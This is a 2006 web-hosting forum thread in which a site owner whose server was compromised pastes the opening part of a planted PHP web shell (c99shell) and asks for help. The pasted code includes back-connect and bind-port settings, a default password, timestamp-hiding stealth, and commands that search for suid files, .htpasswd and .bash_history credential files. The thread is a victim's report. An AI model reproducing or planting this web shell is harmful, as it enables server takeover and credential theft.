Register or have you forgotten your password?
Get the most out of Surmunity, read our tips here! Need an interesting blog to read? You've got to read the Surpass Blog!
| Welcome! Please register to access all of our features.
August 31st, 2006, 10:28 AM
|
#1 (permalink) |
|
Registered User
Seasoned Poster
Joined in Jun 2004
Lives in Riverside, CA
Hosted on Vocal
32 posts
Gave thanks: 0
Thanked 0 times
|
Help! webserver being hacked!
have a guy who'se hacking into my webserver that hosts my site :
http://www.digitaluprising.net somehow he's adding files to public_html directory, and I've changed the password to access the ftp or webserver. I dont know how he's doing it?! any ideas? here's part of a php file he's created, i dont know what it will do (i fount this in the root dir of "public_html"): Code:
<?php
//Starting calls
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
error_reporting(5);
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
$win = strtolower(substr(PHP_OS,0,3)) == "win";
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
$shver = "1.0 pre-release build #16"; //Current version
//CONFIGURATION AND SETTINGS
if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
}
$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
if (empty($surl))
{
$surl = "?".$includestr; //Self url
}
$surl = htmlspecialchars($surl);
$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
//Authentication
$login = ""; //login
//DON'T FORGOT ABOUT PASSWORD!!!
$pass = ""; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted area"; //http-auth message.
$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";
$gzipencode = TRUE; //Encode with gzip?
$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server
$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server
$filestealth = TRUE; //if TRUE, don't change modify- and access-time
$donated_html = "<center><b>Owned by hacker</b></center>";
/* If you publish free shell and you wish
add link to your site or any other information,
put here your html. */
$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
$curdir = "./"; //start folder
//$curdir = getenv("DOCUMENT_ROOT");
$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
$log_email = "user@host.tld"; //Default e-mail for sending logs
$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
// Registered file-types.
// array(
// "{action1}"=>array("ext1","ext2","ext3",...),
// "{action2}"=>array("ext4","ext5","ext6",...),
// ...
// )
$ftypes = array(
"html"=>array("html","htm","shtml"),
"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
"exe"=>array("sh","install","bat","cmd"),
"ini"=>array("ini","inf"),
"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
"sdb"=>array("sdb"),
"phpsess"=>array("sess"),
"download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);
// Registered executable file-types.
// array(
// string "command{i}"=>array("ext1","ext2","ext3",...),
// ...
// )
// {command}: %f% = filename
$exeftypes = array(
getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
"perl %f%" => array("pl","cgi")
);
/* Highlighted files.
array(
i=>array({regexp},{type},{opentag},{closetag},{break})
...
)
string {regexp} - regular exp.
int {type}:
0 - files and folders (as default),
1 - files only, 2 - folders only
string {opentag} - open html-tag, e.g. "<b>" (default)
string {closetag} - close html-tag, e.g. "</b>" (default)
bool {break} - if TRUE and found match then break
*/
$regxp_highlight = array(
array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
array("config.php",1) // example
);
$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
// array (i=>{letter} ...); string {letter} - letter of a drive
//$safemode_diskettes = range("a","z");
$hexdump_lines = 8;// lines in hex preview file
$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
$nixpwdperpage = 100; // Get first N lines from /etc/passwd
$bindport_pass = "c99"; // default password for binding
$bindport_port = "31373"; // default port for binding
$bc_port = "31373"; // default port for back-connect
$datapipe_localport = "8081"; // default port for datapipe
// Command-aliases
if (!$win)
{
$cmdaliases = array(
array("-----------------------------------------------------------", "ls -la"),
array("find all suid files", "find / -type f -perm -04000 -ls"),
array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
array("find all sgid files", "find / -type f -perm -02000 -ls"),
array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
array("find config.inc.php files", "find / -type f -name config.inc.php"),
array("find config* files", "find / -type f -name \"config*\""),
array("find config* files in current dir", "find . -type f -name \"config*\""),
array("find all writable folders and files", "find / -perm -2 -ls"),
array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
array("find all service.pwd files", "find / -type f -name service.pwd"),
array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
array("find all .htpasswd files", "find / -type f -name .htpasswd"),
array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
array("find all .bash_history files", "find / -type f -name .bash_history"),
array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
array("list file attributes on a Linux second extended file system", "lsattr -va"),
array("show opened ports", "netstat -an | grep -i listen")
);
}
else
{
$cmdaliases = array(
array("-----------------------------------------------------------", "dir"),
array("show opened ports", "netstat -an")
);
}
$sess_cookie = "c99shvars"; // Cookie-variable name
$usefsbuff = TRUE; //Buffer-function
$copy_unset = FALSE; //Remove copied files from buffer after pasting
__________________
www.digitaluprising.net [primary] on server: Vocal (72.29.74.35) : Shared __________________________ www.3extremedesigns.net on server: Romeo (72.29.74.111) : Shared 
|
|
    
|
|
August 31st, 2006, 10:54 AM
|
#3 (permalink) |
|
I admire kayla
On a golden path...
Joined in Aug 2003
Lives in Saint Petersburg, Florida
Hosted on VPS5
478 posts
Gave thanks: 1
Thanked 1 Time in 1 Post
|
Remove it and contact surpass ASAP. Its a hacker tool. With this they can see inside all of your folders. I don't know what else it can do.
__________________
“The object of war is not to die for your country, but to make some other bastard die for his.” -George Patton VPS5 |
|
|
|
|
August 31st, 2006, 11:24 AM
|
#4 (permalink) |
|
Registered User
Seasoned Poster
Joined in Jun 2004
Lives in Riverside, CA
Hosted on Vocal
32 posts
Gave thanks: 0
Thanked 0 times
|
sent the file as requested unleashed. Thanks.
__________________
www.digitaluprising.net [primary] on server: Vocal (72.29.74.35) : Shared __________________________ www.3extremedesigns.net on server: Romeo (72.29.74.111) : Shared
|
|
|
|
|
August 31st, 2006, 11:57 AM
|
#5 (permalink) |
|
I admire kayla
On a golden path...
Joined in Aug 2003
Lives in Saint Petersburg, Florida
Hosted on VPS5
478 posts
Gave thanks: 1
Thanked 1 Time in 1 Post
|
Can you please get on your aim?
__________________
“The object of war is not to die for your country, but to make some other bastard die for his.” -George Patton VPS5 |
|
|
|
|
August 31st, 2006, 12:29 PM
|
#6 (permalink) |
|
I admire kayla
On a golden path...
Joined in Aug 2003
Lives in Saint Petersburg, Florida
Hosted on VPS5
478 posts
Gave thanks: 1
Thanked 1 Time in 1 Post
|
This is a very advanced and well done script. With it I placed it on my one of my servers (a vps) and got access to root very fast. Hopfully your server can be fixed soon by a level 3 admin or less.
__________________
“The object of war is not to die for your country, but to make some other bastard die for his.” -George Patton VPS5 |
|
|
|
|
August 31st, 2006, 8:26 PM
|
#7 (permalink) |
|
Registered User
Seasoned Poster
Joined in Jun 2004
Lives in Riverside, CA
Hosted on Vocal
32 posts
Gave thanks: 0
Thanked 0 times
|
I removed it, at submitted a request to the help desk. I hope they can help me out. Appreciate you taking a look at it man. All's well for now. Remote backup done just to be on the safe side.
__________________
www.digitaluprising.net [primary] on server: Vocal (72.29.74.35) : Shared __________________________ www.3extremedesigns.net on server: Romeo (72.29.74.111) : Shared
|
|
|
|
|
August 31st, 2006, 11:16 PM
|
#8 (permalink) |
|
Registered User
Seasoned Poster
Joined in Jun 2004
Lives in Riverside, CA
Hosted on Vocal
32 posts
Gave thanks: 0
Thanked 0 times
|
apparently they were hacking into via a module i had on phpnuke site called "vwar" The surpass admins help me get the holes closed up, had to disable the module till i get it figured out. Very appreciative of the quick response and all the help.
Thanks guys.
__________________
www.digitaluprising.net [primary] on server: Vocal (72.29.74.35) : Shared __________________________ www.3extremedesigns.net on server: Romeo (72.29.74.111) : Shared
|
|
|
|
